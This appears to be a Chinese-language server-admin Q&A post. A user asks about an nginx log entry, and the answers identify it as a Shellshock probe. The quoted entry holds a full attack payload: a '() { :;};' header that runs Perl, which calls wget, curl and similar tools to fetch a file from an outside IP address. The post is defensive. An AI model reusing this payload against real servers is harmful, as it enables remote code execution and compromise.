nginx 访问日志中有不少如下所示的条目。我如何知道这些脚本的结果以及我的服务器是否受到攻击?
162.232.183.48 - - [14/Jan/2016:10:54:57 +0000] "GET /cgi-bin/php4 HTTP/1.1" 200 1494 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22 wget http://2
04.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232
.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \x22);'" "-"
答案1
注意魔术字符串() { :; };。他们试图四处探查,看看你的服务器是否容易受到ShellShock 漏洞。这里使用Perl来打印并查看攻击是否成功。
测试你的服务器是否容易受到 ShellShock 攻击如果不是,您就清楚了。
也可以看看:我的服务器是否容易受到 perl 攻击?
答案2
他想对你进行攻击。有趣的是,他错误地配置了他的攻击。我捕获了恶意软件,但他的 wget/fetch/etc 失败了,因为他的包不存在 :-)